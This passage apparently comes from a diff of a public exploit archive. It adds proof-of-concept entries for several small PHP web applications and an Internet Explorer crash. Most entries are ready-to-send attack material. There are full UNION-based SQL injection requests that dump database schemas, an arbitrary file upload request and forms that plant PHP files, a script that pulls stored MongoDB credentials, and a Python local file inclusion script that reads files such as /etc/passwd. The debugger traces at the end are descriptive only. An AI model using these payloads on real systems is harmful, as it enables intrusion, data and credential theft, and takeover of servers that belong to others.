# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.bubul.net/
# Software Link: https://kent.dl.sourceforge.net/project/siadmin/SiAdmin%201.1/SiAdmin%201.1.zip
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/modul/mod_beasiswa/print.php?op=print&id=[SQL]
#
GET /[PATH]/modul/mod_beasiswa/print.php?op=print&id=-4%27%20%20UNION%20%20SELECT%201,2,3,4,5,6,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),8--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 13:22:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=0, must-revalidate
Pragma: public
Content-Disposition: inline; filename="Ansanwan-Laporan.pdf"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/pdf
# POC:
# 2)
# http://localhost/[PATH]/show.php?op=beasiswa&act=lihat&id=[SQL]
#
GET /[PATH]/show.php?op=beasiswa&act=lihat&id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%37%2c%38%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 13:30:25 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6079
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

97
exploits/php/webapps/45775.txt Normal file
View file

@ -0,0 +1,97 @@
# Exploit Title: WebVet 0.1a - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://webvet.exreality.net/
# Software Link: https://netix.dl.sourceforge.net/project/webvet/webvet_2013_07_08.zip
# Version: 0.1a
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# /[PATH]/client.php
#091 else if (!empty($_POST['form_search_client']))
#092 {
#093 $searchedClient = new Client();
#094 if (!empty($_POST['id']))
#095 $searchedClient->id = $_POST['id'];
#096 if (!empty($_POST['lastname']))
#097 $searchedClient->lastname = $_POST['lastname'];
#098 if (!empty($_POST['patient']))
#099 $searchedClient->patient = $_POST['patient'];
#100
#101 // do the search
#102 $db_connection = db_open(db_user_name, db_user_passw, db_name);
#103 if (!$db_connection) die;
#104 $clients = db_search_client($searchedClient, clients_table_name, $db_connection);
#105 include "clients_view.php";
#106 }
# POC:
# 1)
# http://localhost/[PATH]/client.php
#
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 525
id=1 UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:13:34 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/client.php
#
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 501
lastname=' UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:19:04 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/client.php
#
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 499
patient=' UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:21:05 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

87
exploits/php/webapps/45777.txt Normal file
View file

@ -0,0 +1,87 @@
# Exploit Title: Poppy Web Interface Generator 0.8 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://poppy.dc-development.de/
# Software Link: https://master.dl.sourceforge.net/project/poppy-beta-rc/poppy_0.8_beta_rc.zip
# Version: 0.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/phpWebFileManager-0.7/index.php
#
POST /[PATH]/phpWebFileManager-0.7/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------497318546845924055941951022
Content-Length: 732
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_filename"
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_dir"
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_action"
upload_file
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_userfile[0]"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_submit"
File upload
-----------------------------497318546845924055941951022--
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 12:10:16 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/poppy_app/public/[FILE]
#
<html>
<body>
#File Upload:
<form enctype="multipart/form-data" method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="upload_file" name="fm_action" type="hidden">
<input value="" name="fm_userfile[0]" type="file">
<input name="fm_submit" value="File upload" type="submit">
</form>
#Create File:
<form method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="create_file" name="fm_action" type="hidden">
<input value="test.php" name="fm_new_filename" type="text">
<input name="fm_submit" value="Create file" type="submit">
</form>
#File Edit:
<form method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="test.php" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="save_file" name="fm_action" type="hidden">
<textarea id="code" name="fm_file_data" rows="40" cols="140"></textarea>
<input name="fm_submit" value="Save" type="submit">
</form>
</body>
</html>

73
exploits/php/webapps/45779.txt Normal file
View file

@ -0,0 +1,73 @@
# Exploit Title: Mongo Web Admin 6.0 - Information Disclosure
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.mongoadmin.org/
# Software Link: https://netix.dl.sourceforge.net/project/mongo-web-admin/mongoDesktopAdminSetup-beta-6.exe
# Version: 6.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Status/Protocol/Local host/Local port/Remote host/Remote port/PID/Process name
# Established/TCP/127.0.0.1/6376/127.0.0.1/6393/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6376/127.0.0.1/6394/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6393/127.0.0.1/6376/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6394/127.0.0.1/6376/4520/mongoDesktopAdmin
GET /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,* /*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Cookie: PHPSESSID=npbo6p4par2h1flfvc4lv04ok4; mongo-web-admin-session=bvf9kg9nod2gttd6rstk2l4q30
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 16:27:16 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 490
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
header ('Content-type: text/html; charset=UTF-8');
$urlemiz= "http://127.0.0.1:6376/webservice/Data/";
$y="connections.json";
$jsonveri = file_get_contents($urlemiz.$y);
$ver = json_decode($jsonveri,true);
echo "<pre>\n";
print_r($ver);
echo "\n</pre>";
/**
Array
(
[0] => Array
(
[id] => 0.81395000 1342373198
[name] => Default
[host] => localhost
[port] => 27017
[user] => user1
[password] => pass1
)
[1] => Array
(
[id] => 0.54691200 1541333748
[name] => New connection
[host] => localhost
[port] => 27017
[user] => user2
[password] => pass2
)
)

33
exploits/php/webapps/45780.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: PHP-Proxy 3.0.3 - Local File Inclusion
# Date: 04.11.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.php-proxy.com/
# Software Link: https://github.com/Athlon1600/php-proxy-app
# Version: v3.0.3
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target/index.php?q=file:///[FilePath]
# PoC
#!/usr/bin/python
import urllib2, httplib, sys
print "\n[*] PHP-Proxy 3.0.3 LFI PoC By AkkuS"
print "[*] My Blog - https://www.pentest.com.tr\n"
print "[+] usage: python " + __file__ + " http://<target_ip/domain>"
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <target_ip/domain>"
exit(0)
ip_add = sys.argv[1]
fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')
print "Exploiting....."
print '\n'
URL = "http://" + ip_add + "/index.php?q=file:///" + fd + ""
print urllib2.urlopen(URL).read()

37
exploits/php/webapps/45784.txt Normal file
View file

@ -0,0 +1,37 @@
Exploit Title: Voovi Social Networking Script 1.0 - 'user' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.adminspoint.com/voovi/index.php
# Software Link: https://netix.dl.sourceforge.net/project/voovi/voovi%20a%20social%20networking%20script.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/?
#
POST /[PATH]/? HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
user=1' UNION SELECT NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL-- -&password=&action=login&submit=
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 14:22:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=v8nhfofpnrt6a4clfqbrp7aa00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5987
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

193
exploits/windows/local/45778.txt Normal file
View file

@ -0,0 +1,193 @@
# Exloit Title: Microsoft Internet Explorer 11 - Null Pointer Difference
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-11-03
# Vendor: Microsoft Corporation
# Product web page: https://www.microsoft.com
# Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949))
# 11.1387.15063.0 (Update Versions: 11.0.90 (KB4462949))
# 11.0.9600.18282 (Update Versions: 11.0.30 (KB3148198))
# 11.0.9600.17843 (Update Versions: 11.0.20 (KB3058515))
# Tested on: Microsoft Windows 10 (EN) (64bit)
# Microsoft Windows 7 SP1 (EN) (32/64bit)
# Affected module: mshtml.dll
# Affected functions: Tree::Notify_InvalidateDisplay
# CTreeNode::EnsureNoDependentLayoutFixup
# CMarkup::BuildDescendentsList
# References:
# Advisory ID: ZSL-2018-5499
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5499.php
# Desc: The crash is caused due to a NULL pointer dereference access violation inside the
# 'Tree::Notify_InvalidateDisplay' function while parsing malformed DOM elements. The issue
# was discovered using the Domato fuzzer.
# Microsoft Internet Explorer 11 Tree::Notify_InvalidateDisplay Null Pointer Dereference
# PoC: https://www.zeroscience.mk/codes/msie11_nullptr_fuzz-33.html.rar
# Trace:
################################################################################################
(e9c.142c): Access violation - code c0000005 (!!! second chance !!!)
eax=21b9efa0 ebx=21b9efac ecx=21b9efa0 edx=00000000 esi=00000000 edi=187a8fc4
eip=63f04e48 esp=08c39ab8 ebp=08c39ac4 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43:
63f04e48 f70600010000 test dword ptr [esi],100h ds:002b:00000000=????????
0:007> k
# ChildEBP RetAddr
00 08c39ac4 63a52ddf MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43
01 08c39bd0 63a523c5 MSHTML!CMarkup::InsertElementInternalNoInclusions+0x1f3
02 08c39bf8 63a529d3 MSHTML!CMarkup::InsertElementInternal+0x3d
03 08c39c38 63a52a54 MSHTML!CDoc::InsertElement+0x9b
04 08c39cf8 63a3ca96 MSHTML!InsertDOMNodeHelper+0x154
05 08c39db8 63a3cc73 MSHTML!CElement::InsertBeforeHelper+0x22b
06 08c39ddc 63a3cff3 MSHTML!CElement::InsertBefore+0x2f
07 08c39e70 63a3cf06 MSHTML!CElement::Var_appendChild+0xb3
08 08c39ea0 6de5e6ee MSHTML!CFastDOM::CNode::Trampoline_appendChild+0x75
09 08c39f08 6de582cd jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x101
0a 08c39f50 6df0833d jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
0b 08c39f74 6dffc483 jscript9!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutCallI> >+0x53
0c 08c39fa0 6dffc45c jscript9!Js::InterpreterStackFrame::OP_ProfileReturnTypeCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutCallI> >+0x1c
0d 08c39fc0 6dffc428 jscript9!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallI<Js::OpLayoutCallI>+0x2a
0e 08c3a1b0 6dee5371 jscript9!Js::InterpreterStackFrame::Process+0x4e90
0f 08c3a1e8 6dee53d0 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
10 08c3a3d8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x39dc
11 08c3bde4 0d8c0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce
WARNING: Frame IP not in any known module. Following frames may be wrong.
12 08c3bdf0 6de5c22d 0xd8c0fd9
13 08c3bfe8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x1940
14 08c3c104 0d8c0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce
15 08c3c110 6de582cd 0xd8c0fe1
16 08c3c158 6de58a05 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
17 08c3c1cc 6de5893f jscript9!Js::JavascriptFunction::CallRootFunction+0xc1
18 08c3c214 6de588bf jscript9!ScriptSite::CallRootFunction+0x42
19 08c3c244 6de5d0f0 jscript9!ScriptSite::Execute+0x61
1a 08c3c2a0 6de5d02c jscript9!ScriptEngineBase::ExecuteInternal<0>+0xbb
1b 08c3c2b8 63a362a4 jscript9!ScriptEngineBase::Execute+0x1c
1c 08c3c374 63a3613e MSHTML!CListenerDispatch::InvokeVar+0x15a
1d 08c3c3a0 63a35e01 MSHTML!CListenerDispatch::Invoke+0x6d
1e 08c3c440 6398e7d2 MSHTML!CEventMgr::_InvokeListeners+0x1fe
1f 08c3c5b4 639d2863 MSHTML!CEventMgr::Dispatch+0x3bb
20 08c3c5dc 63eadc91 MSHTML!CEventMgr::DispatchEvent+0x90
21 08c3c5f0 63e94da9 MSHTML!CSVGElement::Fire_SVGLoad+0x46
22 08c3c608 63eadc43 MSHTML!CSVGSVGElement::Fire_SVGLoad+0x19
23 08c3c620 63dafdc1 MSHTML!CSVGElement::Fire_SVGLoad_Async_Handler+0x23
24 08c3c64c 6398f25c MSHTML!CAsyncEventQueue::DispatchAllEvents+0x41c3ea
25 08c3c6a0 771462fa MSHTML!GlobalWndProc+0x2d3
26 08c3c7bc 00a3ee48 user32!InternalCallWinProc+0x23
27 08c3c7c0 076bafe0 0xa3ee48
28 08c3c7c4 00000000 0x76bafe0
################################################################################################
(15e4.1634): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=22a98fa0 ecx=00000061 edx=000000c1 esi=22a96fac edi=0969c384
eip=63916681 esp=0969c1d8 ebp=0969c200 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!CMarkup::BuildDescendentsList+0x158:
63916681 81b828030000609ffd63 cmp dword ptr [eax+328h],offset MSHTML!__vtguard (63fd9f60) ds:002b:00000328=????????
0:008> k
# ChildEBP RetAddr
00 0969c200 6384f86d MSHTML!CMarkup::BuildDescendentsList+0x158
01 0969c350 639b1597 MSHTML!CMarkup::Notify+0x17b
02 0969c3b8 639b1431 MSHTML!CMarkup::OnLoadStatusDone+0x14b
03 0969c3cc 639b078b MSHTML!CMarkup::OnLoadStatus+0xfa
04 0969c810 639aa322 MSHTML!CProgSink::DoUpdate+0x4c7
05 0969c81c 6382e541 MSHTML!CProgSink::OnMethodCall+0x12
06 0969c868 6382de4a MSHTML!GlobalWndOnMethodCall+0x16d
07 0969c8b8 771462fa MSHTML!GlobalWndProc+0x2e5
08 0969c8e4 77146d3a user32!InternalCallWinProc+0x23
09 0969c95c 771477c4 user32!UserCallWinProcCheckWow+0x109
0a 0969c9bc 7714788a user32!DispatchMessageWorker+0x3b5
0b 0969c9cc 6ce3f7c8 user32!DispatchMessageW+0xf
0c 0969fb98 6cf8f738 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
0d 0969fc58 7732e61c IEFRAME!LCIETab_ThreadProc+0x37b
0e 0969fc70 72f93991 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
0f 0969fca8 764b336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
10 0969fcb4 778a9902 kernel32!BaseThreadInitThunk+0xe
11 0969fcf4 778a98d5 ntdll!__RtlUserThreadStart+0x70
12 0969fd0c 00000000 ntdll!_RtlUserThreadStart+0x1b
################################################################################################
FAILURE_BUCKET_ID: NULL_CLASS_PTR_READ_AVRF_c0000005_MSHTML.dll!Tree::Notify_InvalidateDisplay
BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_READ_INVALID_POINTER_READ_AFTER_CALL_AVRF_MSHTML!Tree::Notify_InvalidateDisplay+19
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: MSHTML.dll
--
(d98.d24): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Tree::Notify_InvalidateDisplay+0x1f:
555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=????????
1:022:x86> r
eax=00000000 ebx=204d6b40 ecx=10ba9500 edx=00000001 esi=204d6b40 edi=10ba9500
eip=555ae81a esp=0535d3f8 ebp=0535d454 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!Tree::Notify_InvalidateDisplay+0x1f:
555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=????????
1:022:x86> kb
# ChildEBP RetAddr Args to Child
00 0535d400 55d882b4 00000000 19540000 148ca2d0 MSHTML!Tree::Notify_InvalidateDisplay+0x1f
01 0535d454 55d547e9 148ca2a0 0535d4c8 204c7770 MSHTML!Tree::Notify_TextRangeHighlighted+0x140
02 0535d4ac 55d55337 204c7770 204c7720 00000000 MSHTML!CSelectionRenderingServiceProvider::InvalidateSegment+0x148
03 0535d4ec 5582e569 148ca270 00000001 19070980 MSHTML!CSelectionRenderingServiceProvider::PrivateClearSegment+0x106
04 0535d504 556a24db 049c8000 148ca270 00000200 MSHTML!CDoc::RemoveSegment+0x39
05 0535d52c 5529fe11 0535d55c 5529fdd0 11ef40b0 MSHTML!CSelTrackServices::ClearSelection+0x401d83
06 0535d548 555e656d 00000000 00000001 00000001 MSHTML!CSelectTracker::BecomeDormant+0x41
07 0535d568 555f8288 00000000 00000001 00000001 MSHTML!CSelectionManager::HibernateTracker+0x2b
08 0535d590 55f054b1 00000000 00000001 0000000c MSHTML!CSelectionManager::EnsureDefaultTrackerPassive+0x51
09 0535d5c8 557f8eda 0535d630 555e9c37 00000000 MSHTML!CSelectionManager::DoPendingElementExit+0x429
0a 0535d5d0 555e9c37 00000000 5555c8fa 00000000 MSHTML!CSelectionManager::DoPendingTasks+0x20f28e
0b 0535d5d8 5555c8fa 00000000 1b034680 00000000 MSHTML!CSelectionManager::EnsureEditContext+0x20
0c 0535d630 5555c80e 0000000c 00000000 00000000 MSHTML!CSelectionManager::Notify+0x7c
0d 0535d654 5555c7a5 1b034680 0000000c 00000000 MSHTML!CHTMLEditor::Notify+0x51
0e 0535d670 5555c5fd 1b034680 0000000c 00000000 MSHTML!CHTMLEditorProxy::Notify+0x35
0f 0535d698 555e7edb 0000000c 00000000 00000000 MSHTML!CDoc::NotifySelection+0x4f
10 0535d92c 555e5c91 00000000 555e5c50 555e5c50 MSHTML!CCaret::UpdateScreenCaret+0xbe
11 0535d940 555baffb 10b7d8f0 049c8000 0000011f MSHTML!CCaret::DeferredUpdateCaret+0x41
12 0535d9bc 555bb394 d836afd1 00008002 00000000 MSHTML!GlobalWndOnMethodCall+0x21b
13 0535da08 75a9be6b 00190984 00008002 00000000 MSHTML!GlobalWndProc+0xe4
14 0535da34 75a9833a 555bb2b0 00190984 00008002 USER32!_InternalCallWinProc+0x2b
15 0535db1c 75a97bee 555bb2b0 00000000 00008002 USER32!UserCallWinProcCheckWow+0x3aa
16 0535db98 75a979d0 b9836150 0535fd34 5643485f USER32!DispatchMessageWorker+0x20e
17 0535dba4 5643485f 0535dbe0 00e4b470 008ff230 USER32!DispatchMessageW+0x10
18 0535fd34 56433e60 0535fe00 56433a50 00e433e8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x46f
19 0535fdf4 5bdcb61c 00e4b470 0535fe18 56488ce0 IEFRAME!LCIETab_ThreadProc+0x410
1a 0535fe0c 5bd6e6cd 00e433e8 5bd6e640 5bd6e640 msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
1b 0535fe44 77648484 0089c570 77648460 f7de4b1c IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
1c 0535fe58 77a7305a 0089c570 005c205f 00000000 KERNEL32!BaseThreadInitThunk+0x24
1d 0535fea0 77a7302a ffffffff 77a8ec8b 00000000 ntdll_77a10000!__RtlUserThreadStart+0x2f
1e 0535feb0 00000000 5bd6e640 0089c570 00000000 ntdll_77a10000!_RtlUserThreadStart+0x1b
1:022:x86> .exr -1
ExceptionAddress: 555ae81a (MSHTML!Tree::Notify_InvalidateDisplay+0x0000001f)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 00000418
Attempt to read from address 00000418
1:022:x86> ub
MSHTML!Tree::Notify_InvalidateDisplay+0x7:
555ae802 f7460800001000 test dword ptr [esi+8],100000h
555ae809 756e jne MSHTML!Tree::Notify_InvalidateDisplay+0x7e (555ae879)
